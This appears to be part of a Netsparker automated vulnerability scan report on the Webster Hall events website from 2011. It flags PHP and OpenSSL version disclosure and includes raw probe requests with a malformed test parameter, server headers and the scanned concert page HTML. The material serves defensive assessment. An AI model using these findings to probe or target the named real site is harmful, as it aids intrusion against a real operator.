alert('Cannot create XMLHTTP instance'); return false; } windowtitle = title; http_request.onreadystatechange = alertContents; http_request.open('POST', url, true); http_request.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); http_request.setRequestHeader("Content-length", parameters.length); http_request.setRequestHeader("Connection", "close"); http_request.send(parameters); } function alertContents() { //vvar box = document.getElementById('box'); var result = ""; // document.getElementById('filter').style.display='block'; vfilter.style.display='block'; var head = document.getElementById('boxtitle'); document.bgColor = "#000000"; head.innerHTML = windowtitle; //var content = document.getElementById('boxcontent'); vcontent.style.padding = "0"; if (http_request.readyState == 4) { if (http_request.status == 200) { // alert(http_request.responseText); result = http_request.responseText; //document.getElementById('list_div').innerHTML = result; } else { // uncomment for debugging // alert('There was a problem with the request.'); } } vcontent.innerHTML = "<img src='../images/loading.gif' border=0>"; vcontent.innerHTML = result; // box.style.display='block'; vbox.style.display='block'; } function list_post(id, title, cdate) { //var content = document.getElementById('boxcontent'); vcontent.innerHTML = "<img src='../images/loading.gif' border=0>"; var poststr = "id="+id+"&size=small&cdate="+cdate; // uncomment for debugging //alert(poststr); makePOSTRequest('show_event.php', poststr, title); } function openbox(url) { //var box = document.getElementById('box'); //document.getElementById('filter').style.display='block'; vfilter.style.display='block'; var title = document.getElementById('boxtitle'); // title.innerHTML = url; //var content = document.getElementById('boxcontent'); vcontent.style.padding="0"; vcontent.innerHTML = "...dynamic content..."; vcontent.innerHTML = url; //box.style.display='block'; vbox.style.display='block'; } function closebox() { vbox.style.display='none'; vfilter.style.display='none'; //document.getElementById('box').style.display = 'none'; //document.getElementById('filter').style.display = 'none'; document.bgColor='#000000';}--></script><script language="JavaScript" type="text/javascript"><!--function zxcWWHS(){ if (document.all) { zxcCur='hand'; zxcWH=document.documentElement.clientHeight; zxcWW=document.documentElement.clientWidth; zxcWS=document.documentElement.scrollTop; if (zxcWH==0) { zxcWS=document.body.scrollTop; zxcWH=document.body.clientHeight; zxcWW=document.body.clientWidth; } } else if (document.getElementById) { zxcCur='pointer'; zxcWH=window.innerHeight-15; zxcWW=window.innerWidth-15; zxcWS=window.pageYOffset; } zxcWC=Math.round(zxcWW/2); return [zxcWW,zxcWH,zxcWS];}window.onscroll=function(){ var img=document.getElementById('box'); if (!document.all){ img.style.position='fixed'; window.onscroll=null; return; } if (!img.pos){ img.pos=img.offsetTop; } img.style.top=(parseInt(zxcWWHS()[2])+100)+'px';}//--></script><base target="_blank"></head><style type="text/css"><!--body{ background-color:#000000;}--></style><!--<body style="background-color:#000000;" onload='javascript:adm_onload();'>--><div id="filter"></div><div id="box" style="background-color:#000000;"> <div id="boxheader"> <span id="boxtitle"> </span> <span id="boxclose" onClick="closebox()"></span> </div> <div id="boxcontent"> </div></div><table width="750" border="0" align="center" cellpadding="0" cellspacing="0"> <tr><td></td></tr> <tr> <td valign="top"><!--div class="top"><h4>Webster Hall New York City | Nightclub | Venue | Record Label</h4><h1>7pm - Sia</h1></div--><div class="content"><strong>Wednesday, July 27, 2011 - 7:00 PM</strong><br><p><table width="756" border="0" cellspacing="10" cellpadding="5">
<tbody>
<tr valign="top" bgcolor="#0C0C0C">
<td colspan="2" align="center" valign="middle"><span style="font-size: large; "><br />
<strong><font color="#FF0000">
<meta charset="utf-8"><span class="Apple-style-span" style="color: rgb(0, 0, 0); font-family: 'Times New Roman', Times, serif; font-weight: normal; -webkit-border-horizontal-spacing: 0px; -webkit-border-vertical-spacing: 0px; font-size: 13px; line-height: 16px; ">
<h1 style="margin-top: 0px; margin-right: 0px; margin-bottom: 0.5em; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-size: 21px; font-weight: normal; line-height: 0.95em; color: rgb(153, 0, 0); ">Sia</h1>
<h2 style="margin-top: 0px; margin-right: 0px; margin-bottom: 0.5em; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-size: 13px; font-weight: normal; line-height: 1.23em; "><span style="color: rgb(255, 255, 255); ">Oh Land</span></h2>
</span> </meta>
</font></strong></span></td>
</tr>
<tr valign="top">
<td width="355">
<table width="100%" border="0" cellspacing="5" cellpadding="5">
<tbody>
<tr bgcolor="#0C0C0C">
<td width="22%" valign="top"><b><span style="font-size: small; ">Ages</span></b></td>
<td width="78%"><span style="color: rgb(255, 255, 255); "><span style="font-size: small; ">18+</span></span></td>
</tr>
<tr bgcolor="#0C0C0C">
<td valign="top"><span style="color: rgb(255, 255, 255); "><b><span style="font-size: small; ">Doors</span></b></span></td>
<td><span style="color: rgb(255, 255, 255); "><span style="font-size: small; ">7pm</span></span></td>
</tr>
<tr bgcolor="#0C0C0C">
<td valign="top"><span style="color: rgb(255, 255, 255); "><b><span style="font-size: small; ">Tickets</span></b></span></td>
<td valign="top"><font class="Apple-style-span" color="#ffffff" size="2">$26 advance / $30 day of show&nbsp;</font><br />
<meta charset="utf-8"><font class="Apple-style-span" color="#990000" face="'Times New Roman', Times, serif"><span class="Apple-style-span" style="font-size: 11px; line-height: 13px; text-transform: uppercase; -webkit-border-horizontal-spacing: 0px; -webkit-border-vertical-spacing: 0px;">
<meta charset="utf-8" /><span class="Apple-style-span" style="color: rgb(255, 0, 0); font-family: Arial, Helvetica, sans-serif; -webkit-border-horizontal-spacing: 5px; -webkit-border-vertical-spacing: 5px; line-height: normal; text-transform: none; font-size: medium; "><img width="78" height="16" alt="" src="http://event.websterhall.com/upload/www_ticketweb(1).jpeg" /></span><br type="_moz" />
</span></font> </meta>
<span style="font-size: small; "><font class="Apple-style-span" color="#FF0000"><b><br />
</b></font></span></td>
</tr>
<tr bgcolor="#0C0C0C">
<td colspan="2" valign="top"><span class="Apple-style-span" style="font-size: small; "><b>
<div id="artist-info"><dl> <dt><font class="Apple-style-span" color="#FF0000">
<div id="artist-info">
<div id="artist-info">
<meta charset="utf-8"><span class="Apple-style-span" style="color: rgb(153, 0, 0); font-family: 'Times New Roman', Times, serif; font-size: 13px; line-height: 16px; text-transform: uppercase; ">oh land</span> </meta>
</div>
<div id="artist-info">[&nbsp;<a href="http://www.myspace.com/ohlandmusic">MYSPACE</a>]<br />
<span style="color: rgb(255, 255, 255); "><span class="Apple-style-span" style="font-family: 'Times New Roman', Times, serif; font-weight: normal; -webkit-border-horizontal-spacing: 0px; -webkit-border-vertical-spacing: 0px; font-size: 12px; line-height: 16px; ">
<meta charset="utf-8">
<meta charset="utf-8"><span style="color: rgb(255, 255, 255); "><span class="Apple-style-span">Oh Land is a peculiar new cinematic electropop Dane who recently sailed across the sea to the artistic haven of Brooklyn, NY. With an opera singer for a mother, a theater organist for a father and Bj&ouml;rk's Homogenic on constant rotation, Oh Land was enraptured by the combination of experimental and classical arts. &quot;My goal is to sound like I'm from 2050, but still feel really classic, like the music is an old friend,&quot; said Oh Land. She spent her days pirouetting as a ballet dancer at the Danish Royal Ballet Academy when an injury forced her to reinvent herself and discover her true talent and passion as a musician. Oh Land soon released her first album, Fauna, which garnered critical acclaim in her homeland of Denmark. Her soundscapes are lavish, crunchy, symphonic, brute and captivated with rhythms that fly apart. She translates the sounds live via her &quot;contraption&quot; - a homemade one-woman-band music box topped with balloon video projections (seeing is believing). Her music is for movement and new songs such as the thumping &quot;Sun of a Gun&quot; and euphoric &quot;White Nights&quot; have proven to make even the most portentous get up and dance. Having been discovered by Epic Records at 2009's SXSW, she released her US debut EP on October 19, 2010.</span><br />
<br />
</span> <br />
<div id="artist-info"><span style="color: rgb(255, 0, 0); ">
<meta charset="utf-8"><span class="Apple-style-span" style="color: rgb(153, 0, 0); font-size: 13px; text-transform: uppercase; ">Sia<br />
</span>&nbsp;[ </meta>
</span><span class="Apple-style-span" style="color: rgb(0, 0, 0); font-family: Arial, Verdana, sans-serif; line-height: normal; font-size: small; -webkit-border-horizontal-spacing: 5px; -webkit-border-vertical-spacing: 5px; ">
<div id="artist-info" style="display: inline !important; "><dl style="display: inline !important; "><dt style="display: inline !important; "><span style="color: rgb(255, 0, 0); ">
<div id="artist-info" style="display: inline !important; ">
<div id="artist-info" style="display: inline !important; "><a target="_blank" href="http://siamusic.net/">OFFICIAL WEBSITE</a> :&nbsp;</div>
</div>
</span><font class="Apple-style-span" color="#FF0000">
<div id="artist-info" style="display: inline !important; ">
<div id="artist-info" style="display: inline !important; "><span style="color: rgb(255, 255, 255); "><span class="Apple-style-span" style="font-family: 'Times New Roman', Times, serif; font-weight: normal; -webkit-border-horizontal-spacing: 0px; -webkit-border-vertical-spacing: 0px; font-size: 12px; line-height: 16px; ">
<div id="artist-info" style="display: inline !important; "><span style="color: rgb(255, 0, 0); "><a target="_blank" href="http://www.myspace.com/siamusic">MYSPACE</a>]</span><br />
<meta charset="utf-8"><span style="color: rgb(255, 255, 255); ">
<meta charset="utf-8"><span style="color: rgb(255, 255, 255); "><span class="Apple-style-span">Sia Furler, a native Australian, was born on December 18th, 1975 and was destined to be an entertainer. At a young age she would perform for her family and friends with her interpretations of Madonna, Cyndi Lauper and Men at Work. If one should be so lucky to peruse her family albums, they would certainly find photos of Sia as a child adorning pink tutus and roller skates in poses fit for Cirque du Soleil. When Sia was 9 she performed with her father's band The Soda Jerx covering the song &quot;Shimmy Shimmy Coco Bop&quot;. Be..
PHP Version Disclosure

PHP Version Disclosure
1 TOTAL
LOW
Netsparker identified that the target web server is disclosing the PHP version in use through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of PHP.

Impact

An attacker can look for specific security vulnerabilities for the version identified. Also the attacker can use this information in conjunction with the other vulnerabilities in the application or the web server.
- /show_event_sub.php

/show_event_sub.php

http://event.websterhall.com/show_event_sub.php?id=1595&size=dcaf1%5C

Extracted Version

PHP/4.4.9

Request

GET /show_event_sub.php?id=1595&size=dcaf1%5C HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: event.websterhall.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 25 Jul 2011 04:36:00 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/4.4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=6d168262eb70370a72912db093f1d7e5; expires=Wed, 24 Aug 2011 04:36:00 GMT; path=/
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html><head><title>Webster Hall New York City | Nightclub | Venue | Record Label - 7pm - Sia</title><meta name="google-site-verification" content="0Qf19Nve42Bz-Pe2DUjICbC_SYZrzVbAEzEeHwUB49s" /><META NAME="description" CONTENT="Largest night club in New York City, nightclub, dance club, new years, ticket sales." /><META NAME="keywords" CONTENT="New York, NYC, nyc, NY, nightlife, nightlife style, night club, new years, new years eve, nite club, nightclub, nightclubs, clubbing, night club promotions, club dance, club search, dance clubs, bar, party, techno, rave, special event, tickets" /><!--link rel="stylesheet" href="css/default.css" media="screen,projection" type="text/css" /><link rel="stylesheet" href="css/lightbox.css" media="screen,projection" type="text/css" /--><!-- JavaScript --><!--script type="text/javascript" src="scripts/prototype.js"></script><script type="text/javascript" src="scripts/lightbox.js"></script--><link href="mellstyle.css" rel="stylesheet" type="text/css" /><link rel="stylesheet" type="text/css" href="css/supercali.css"><link rel="stylesheet" type="text/css" href="css/small.css"><script language="JavaScript" src="js/CalendarPopup.js"></script><script language="JavaScript">document.write(getCalendarStyles());</script><script language="JavaScript" src="js/ColorPicker2.js"></script><script language="JavaScript" src="js/miscfunctions.js"></script><!-- CSS --><link href="css/css-lightbox.css" rel="stylesheet" type="text/css"/><script type="text/javascript" language="javascript"><!-- var vbox; var vfilter; var vcontent; var http_request = false; var myResponse = "Thank You!"; var windowtitle=""; var XMLHttpArray = [ function() {return new XMLHttpRequest()}, function() {return new ActiveXObject("Msxml2.XMLHTTP")}, function() {return new ActiveXObject("Msxml2.XMLHTTP")}, function() {return new ActiveXObject("Microsoft.XMLHTTP")}]; function adm_onload() { vbox = document.getElementById('box'); vfilter = document.getElementById('filter'); vcontent = document.getElementById('boxcontent'); //vbox.style.display='none'; //vfilter.style.display='none'; } function createXMLHTTPObject() { var xmlhttp = false; for(var i=0; i<XMLHttpArray.length; i++) { try { xmlhttp = XMLHttpArray[i](); } catch(e) { continue; } break; } return xmlhttp; } function makePOSTRequest(url, parameters, title) { http_request = false; /* if (window.XMLHttpRequest) { // Mozilla, Safari,... http_request = new XMLHttpRequest(); if (http_request.overrideMimeType) { // set type accordingly to anticipated content type //http_request.overrideMimeType('text/xml'); http_request.overrideMimeType('text/html'); } } else if (window.ActiveXObject) { // IE try { http_request = new ActiveXObject("Msxml2.XMLHTTP"); } catch (e) { try { http_request = new ActiveXObject("Microsoft.XMLHTTP"); } catch (e) {} } }*/ http_request = createXMLHTTPObject(); if (!http_request) { alert('Cannot create XMLHTTP instance'); return false; } windowtitle = title; http_request.onreadystatechange = alertContents; http_request.open('POST', url, true); http_request.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); http_request.setRequestHeader("Content-length", parameters.length); http_request.setRequestHeader("Connection", "close"); http_request.send(parameters); } function alertContents() { //vvar box = document.getElementById('box'); var result = ""; // document.getElementById('filter').style.display='block'; vfilter.style.display='block'; var head = document.getElementById('boxtitle'); document.bgColor = "#000000"; head.innerHTML = windowtitle; //var content = document.getElementById('boxcontent'); vcontent.style.padding = "0"; if (http_request.readyState == 4) { if (http_request.status == 200) { // alert(http_request.responseText); result = http_request.responseText; //document.getElementById('list_div').innerHTML = result; } else { // uncomment for debugging // alert('There was a problem with the request.'); } } vcontent.innerHTML = "<img src='../images/loading.gif' border=0>"; vcontent.innerHTML = result; // box.style.display='block'; vbox.style.display='block'; } function list_post(id, title, cdate) { //var content = document.getElementById('boxcontent'); vcontent.innerHTML = "<img src='../images/loading.gif' border=0>"; var poststr = "id="+id+"&size=small&cdate="+cdate; // uncomment for debugging //alert(poststr); makePOSTRequest('show_event.php', poststr, title); } function openbox(url) { //var box = document.getElementById('box'); //document.getElementById('filter').style.display='block'; vfilter.style.display='block'; var title = document.getElementById('boxtitle'); // title.innerHTML = url; //var content = document.getElementById('boxcontent'); vcontent.style.padding="0"; vcontent.innerHTML = "...dynamic content..."; vcontent.innerHTML = url; //box.style.display='block'; vbox.style.display='block'; } function closebox() { vbox.style.display='none'; vfilter.style.display='none'; //document.getElementById('box').style.display = 'none'; //document.getElementById('filter').style.display = 'none'; document.bgColor='#000000';}--></script><script language="JavaScript" type="text/javascript"><!--function zxcWWHS(){ if (document.all) { zxcCur='hand'; zxcWH=document.documentElement.clientHeight; zxcWW=document.documentElement.clientWidth; zxcWS=document.documentElement.scrollTop; if (zxcWH==0) { zxcWS=document.body.scrollTop; zxcWH=document.body.clientHeight; zxcWW=document.body.clientWidth; } } else if (document.getElementById) { zxcCur='pointer'; zxcWH=window.innerHeight-15; zxcWW=window.innerWidth-15; zxcWS=window.pageYOffset; } zxcWC=Math.round(zxcWW/2); return [zxcWW,zxcWH,zxcWS];}window.onscroll=function(){ var img=document.getElementById('box'); if (!document.all){ img.style.position='fixed'; window.onscroll=null; return; } if (!img.pos){ img.pos=img.offsetTop; } img.style.top=(parseInt(zxcWWHS()[2])+100)+'px';}//--></script><base target="_blank"></head><style type="text/css"><!--body{ background-color:#000000;}--></style><!--<body style="background-color:#000000;" onload='javascript:adm_onload();'>--><div id="filter"></div><div id="box" style="background-color:#000000;"> <div id="boxheader"> <span id="boxtitle"> </span> <span id="boxclose" onClick="closebox()"></span> </div> <div id="boxcontent"> </div></div><table width="750" border="0" align="center" cellpadding="0" cellspacing="0"> <tr><td></td></tr> <tr> <td valign="top"><!--div class="top"><h4>Webster Hall New York City | Nightclub | Venue | Record Label</h4><h1>7pm - Sia</h1></div--><div class="content"><strong>Wednesday, July 27, 2011 - 7:00 PM</strong><br><p><table width="756" border="0" cellspacing="10" cellpadding="5">
<tbody>
<tr valign="top" bgcolor="#0C0C0C">
<td colspan="2" align="center" valign="middle"><span style="font-size: large; "><br />
<strong><font color="#FF0000">
<meta charset="utf-8"><span class="Apple-style-span" style="color: rgb(0, 0, 0); font-family: 'Times New Roman', Times, serif; font-weight: normal; -webkit-border-horizontal-spacing: 0px; -webkit-border-vertical-spacing: 0px; font-size: 13px; line-height: 16px; ">
<h1 style="margin-top: 0px; margin-right: 0px; margin-bottom: 0.5em; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-size: 21px; font-weight: normal; line-height: 0.95em; color: rgb(153, 0, 0); ">Sia</h1>
<h2 style="margin-top: 0px; margin-right: 0px; margin-bottom: 0.5em; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-size: 13px; font-weight: normal; line-height: 1.23em; "><span style="color: rgb(255, 255, 255); ">Oh Land</span></h2>
</span> </meta>
</font></strong></span></td>
</tr>
<tr valign="top">
<td width="355">
<table width="100%" border="0" cellspacing="5" cellpadding="5">
<tbody>
<tr bgcolor="#0C0C0C">
<td width="22%" valign="top"><b><span style="font-size: small; ">Ages</span></b></td>
<td width="78%"><span style="color: rgb(255, 255, 255); "><span style="font-size: small; ">18+</span></span></td>
</tr>
<tr bgcolor="#0C0C0C">
<td valign="top"><span style="color: rgb(255, 255, 255); "><b><span style="font-size: small; ">Doors</span></b></span></td>
<td><span style="color: rgb(255, 255, 255); "><span style="font-size: small; ">7pm</span></span></td>
</tr>
<tr bgcolor="#0C0C0C">
<td valign="top"><span style="color: rgb(255, 255, 255); "><b><span style="font-size: small; ">Tickets</span></b></span></td>
<td valign="top"><font class="Apple-style-span" color="#ffffff" size="2">$26 advance / $30 day of show&nbsp;</font><br />
<meta charset="utf-8"><font class="Apple-style-span" color="#990000" face="'Times New Roman', Times, serif"><span class="Apple-style-span" style="font-size: 11px; line-height: 13px; text-transform: uppercase; -webkit-border-horizontal-spacing: 0px; -webkit-border-vertical-spacing: 0px;">
<meta charset="utf-8" /><span class="Apple-style-span" style="color: rgb(255, 0, 0); font-family: Arial, Helvetica, sans-serif; -webkit-border-horizontal-spacing: 5px; -webkit-border-vertical-spacing: 5px; line-height: normal; text-transform: none; font-size: medium; "><img width="78" height="16" alt="" src="http://event.websterhall.com/upload/www_ticketweb(1).jpeg" /></span><br type="_moz" />
</span></font> </meta>
<span style="font-size: small; "><font class="Apple-style-span" color="#FF0000"><b><br />
</b></font></span></td>
</tr>
<tr bgcolor="#0C0C0C">
<td colspan="2" valign="top"><span class="Apple-style-span" style="font-size: small; "><b>
<div id="artist-info"><dl> <dt><font class="Apple-style-span" color="#FF0000">
<div id="artist-info">
<div id="artist-info">
<meta charset="utf-8"><span class="Apple-style-span" style="color: rgb(153, 0, 0); font-family: 'Times New Roman', Times, serif; font-size: 13px; line-height: 16px; text-transform: uppercase; ">oh land</span> </meta>
</div>
<div id="artist-info">[&nbsp;<a href="http://www.myspace.com/ohlandmusic">MYSPACE</a>]<br />
<span style="color: rgb(255, 255, 255); "><span class="Apple-style-span" style="font-family: 'Times New Roman', Times, serif; font-weight: normal; -webkit-border-horizontal-spacing: 0px; -webkit-border-vertical-spacing: 0px; font-size: 12px; line-height: 16px; ">
<meta charset="utf-8">
<meta charset="utf-8"><span style="color: rgb(255, 255, 255); "><span class="Apple-style-span">Oh Land is a peculiar new cinematic electropop Dane who recently sailed across the sea to the artistic haven of Brooklyn, NY. With an opera singer for a mother, a theater organist for a father and Bj&ouml;rk's Homogenic on constant rotation, Oh Land was enraptured by the combination of experimental and classical arts. &quot;My goal is to sound like I'm from 2050, but still feel really classic, like the music is an old friend,&quot; said Oh Land. She spent her days pirouetting as a ballet dancer at the Danish Royal Ballet Academy when an injury forced her to reinvent herself and discover her true talent and passion as a musician. Oh Land soon released her first album, Fauna, which garnered critical acclaim in her homeland of Denmark. Her soundscapes are lavish, crunchy, symphonic, brute and captivated with rhythms that fly apart. She translates the sounds live via her &quot;contraption&quot; - a homemade one-woman-band music box topped with balloon video projections (seeing is believing). Her music is for movement and new songs such as the thumping &quot;Sun of a Gun&quot; and euphoric &quot;White Nights&quot; have proven to make even the most portentous get up and dance. Having been discovered by Epic Records at 2009's SXSW, she released her US debut EP on October 19, 2010.</span><br />
<br />
</span> <br />
<div id="artist-info"><span style="color: rgb(255, 0, 0); ">
<meta charset="utf-8"><span class="Apple-style-span" style="color: rgb(153, 0, 0); font-size: 13px; text-transform: uppercase; ">Sia<br />
</span>&nbsp;[ </meta>
</span><span class="Apple-style-span" style="color: rgb(0, 0, 0); font-family: Arial, Verdana, sans-serif; line-height: normal; font-size: small; -webkit-border-horizontal-spacing: 5px; -webkit-border-vertical-spacing: 5px; ">
<div id="artist-info" style="display: inline !important; "><dl style="display: inline !important; "><dt style="display: inline !important; "><span style="color: rgb(255, 0, 0); ">
<div id="artist-info" style="display: inline !important; ">
<div id="artist-info" style="display: inline !important; "><a target="_blank" href="http://siamusic.net/">OFFICIAL WEBSITE</a> :&nbsp;</div>
</div>
</span><font class="Apple-style-span" color="#FF0000">
<div id="artist-info" style="display: inline !important; ">
<div id="artist-info" style="display: inline !important; "><span style="color: rgb(255, 255, 255); "><span class="Apple-style-span" style="font-family: 'Times New Roman', Times, serif; font-weight: normal; -webkit-border-horizontal-spacing: 0px; -webkit-border-vertical-spacing: 0px; font-size: 12px; line-height: 16px; ">
<div id="artist-info" style="display: inline !important; "><span style="color: rgb(255, 0, 0); "><a target="_blank" href="http://www.myspace.com/siamusic">MYSPACE</a>]</span><br />
<meta charset="utf-8"><span style="color: rgb(255, 255, 255); ">
<meta charset="utf-8"><span style="color: rgb(255, 255, 255); "><span class="Apple-style-span">Sia Furler, a native Australian, was born on December 18th, 1975 and was destined to be an entertainer. At a young age she would perform for her family and friends with her interpretations of Madonna, Cyndi Lauper and Men at Work. If one should be so lucky to peruse her family albums, they would certainly find photos of Sia as a child adorning pink tutus and roller skates in poses fit for Cirque du Soleil. When Sia was 9 she performed with her father's band The Soda Jerx covering the song &quot;Shimmy Shimmy Coco Bop&quot;. Be..
OpenSSL Version Disclosure

OpenSSL Version Disclosure
1 TOTAL
LOW
Netsparker identified that the target web server is disclosing OpenSSL version in the HTTP response. This information can help an attacker to develop further attacks and also the system can become an easier target for automated attacks.

Impact

An attacker can look for specific security vulnerabilities for the identified version. Also the attacker can use this information in conjunction with the other vulnerabilities in the application or the web server.

Remedy

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.
- /show_event_sub.php

/show_event_sub.php

http://event.websterhall.com/show_event_sub.php?id=1595&size=dcaf1%5C

Extracted Version

OpenSSL/0.9.8e-fips-rhel5

Request

GET /show_event_sub.php?id=1595&size=dcaf1%5C HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: event.websterhall.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 25 Jul 2011 04:36:00 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/4.4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=6d168262eb70370a72912db093f1d7e5; expires=Wed, 24 Aug 2011 04:36:00 GMT; path=/
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html><head><title>Webster Hall New York City | Nightclub | Venue | Record Label - 7pm - Sia</title><meta name="google-site-verification" content="0Qf19Nve42Bz-Pe2DUjICbC_SYZrzVbAEzEeHwUB49s" /><META NAME="description" CONTENT="Largest night club in New York City, nightclub, dance club, new years, ticket sales." /><META NAME="keywords" CONTENT="New York, NYC, nyc, NY, nightlife, nightlife style, night club, new years, new years eve, nite club, nightclub, nightclubs, clubbing, night club promotions, club dance, club search, dance clubs, bar, party, techno, rave, special event, tickets" /><!--link rel="stylesheet" href="css/default.css" media="screen,projection" type="text/css" /><link rel="stylesheet" href="css/lightbox.css" media="screen,projection" type="text/css" /--><!-- JavaScript --><!--script type="text/javascript" src="scripts/prototype.js"></script><script type="text/javascript" src="scripts/lightbox.js"></script--><link href="mellstyle.css" rel="stylesheet" type="text/css" /><link rel="stylesheet" type="text/css" href="css/supercali.css"><link rel="stylesheet" type="text/css" href="css/small.css"><script language="JavaScript" src="js/CalendarPopup.js"></script><script language="JavaScript">document.write(getCalendarStyles());</script><script language="JavaScript" src="js/ColorPicker2.js"></script><script language="JavaScript" src="js/miscfunctions.js"></script><!-- CSS --><link href="css/css-lightbox.css" rel="stylesheet" type="text/css"/><script type="text/javascript" language="javascript"><!-- var vbox; var vfilter; var vcontent; var http_request = false; var myResponse = "Thank You!"; var windowtitle=""; var XMLHttpArray = [ function() {return new XMLHttpRequest()}, function() {return new ActiveXObject("Msxml2.XMLHTTP")}, function() {return new ActiveXObject("Msxml2.XMLHTTP")}, function() {return new ActiveXObject("Microsoft.XMLHTTP")}]; function adm_onload() { vbox = document.getElementById('box'); vfilter = document.getElementById('filter'); vcontent = document.getElementById('boxcontent'); //vbox.style.display='none'; //vfilter.style.display='none'; } function createXMLHTTPObject() { var xmlhttp = false; for(var i=0; i<XMLHttpArray.length; i++) { try { xmlhttp = XMLHttpArray[i](); } catch(e) { continue; } break; } return xmlhttp; } function makePOSTRequest(url, parameters, title) { http_request = false; /* if (window.XMLHttpRequest) { // Mozilla, Safari,... http_request = new XMLHttpRequest(); if (http_request.overrideMimeType) { // set type accordingly to anticipated content type //http_request.overrideMimeType('text/xml'); http_request.overrideMimeType('text/html'); } } else if (window.ActiveXObject) { // IE try { http_request = new ActiveXObject("Msxml2.XMLHTTP"); } catch (e) { try { http_request = new ActiveXObject("Microsoft.XMLHTTP"); } catch (e) {} } }*/ http_request = createXMLHTTPObject(); if (!http_request) { alert('Cannot create XMLHTTP instance'); return false; } windowtitle = title; http_request.onreadystatechange = alertContents; http_request.open('POST', url, true); http_request.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); http_request.setRequestHeader("Content-length", parameters.length); http_request.setRequestHeader("Connection", "close"); http_request.send(parameters); } function alertContents() { //vvar box = document.getElementById('box'); var result = ""; // document.getElementById('filter').style.display='block'; vfilter.style.display='block'; var head = document.getElementById('boxtitle'); document.bgColor = "#000000"; head.innerHTML = windowtitle; //var content = document.getElementById('boxcontent'); vcontent.style.padding = "0"; if (http_request.readyState == 4) { if (http_request.status == 200) { // alert(http_request.responseText); result = http_request.responseText; //document.getElementById('list_div').innerHTML = result; } else { // uncomment for debugging // alert('There was a problem with the request.'); } } vcontent.innerHTML = "<img src='../images/loading.gif' border=0>"; vcontent.innerHTML = result; // box.style.display='block'; vbox.style.display='block'; } function list_post(id, title, cdate) { //var content = document.getElementById('boxcontent'); vcontent.innerHTML = "<img src='../images/loading.gif' border=0>"; var poststr = "id="+id+"&size=small&cdate="+cdate; // uncomment for debugging //alert(poststr); makePOSTRequest('show_event.php', poststr, title); } function openbox(url) { //var box = document.getElementById('box'); //document.getElementById('filter').style.display='block'; vfilter.style.display='block'; var title = document.getElementById('boxtitle'); // title.innerHTML = url; //var content = document.getElementById('boxcontent'); vcontent.style.padding="0"; vcontent.innerHTML = "...dynamic content..."; vcontent.innerHTML = url; //box.style.display='block'; vbox.style.display='block'; } function closebox() { vbox.style.display='none'; vfilter.style.display='none'; //document.getElementById('box').style.display = 'none'; //document.getElementById('filter').style.display = 'none'; document.bgColor='#000000';}--></script><script language="JavaScript" type="text/javascript"><!--function zxcWWHS(){ if (document.all) { zxcCur='hand'; zxcWH=document.documentElement.clientHeight; zxcWW=document.documentElement.clientWidth; zxcWS=document.documentElement.scrollTop; if (zxcWH==0) { zxcWS=document.body.scrollTop; zxcWH=document.body.clientHeight; zxcWW=document.body.clientWidth; } } else if (document.getElementById) { zxcCur='pointer'; zxcWH=window.innerHeight-15; zxcWW=window.innerWidth-15; zxcWS=window.pageYOffset; } zxcWC=Math.round(zxcWW/2); return [zxcWW,zxcWH,zxcWS];}window.onscroll=function(){ var img=document.getElementById('box'); if (!document.all){ img.style.position='fixed'; window.onscroll=null; return; } if (!img.pos){ img.pos=img.offsetTop; } img.style.top=(parseInt(zxcWWHS()[2])+100)+'px';}//--></script><base target="_blank"></head><style type="text/css"><!--body{ background-color:#000000;}--></style><!--<body style="background-color:#000000;" onload='javascript:adm_onload();'>--><div id="filter"></div><div id="box" style="background-color:#000000;"> <div id="boxheader"> <span id="boxtitle"> </span> <span id="boxclose" onClick="closebox()"></span> </div> <div id="boxcontent"> </div></div><table width="750" border="0" align="center" cellpadding="0" cellspacing="0"> <tr><td></td></tr> <tr> <td valign="top"><!--div class="top"><h4>Webster Hall New York City | Nightclub | Venue | Record Label</h4><h1>7pm - Sia</h1></div--><div class="content"><strong>Wednesday, July 27, 2011 - 7:00 PM</strong><br><p><table width="756" border="0" cellspacing="10" cellpadding="5">
<tbody>
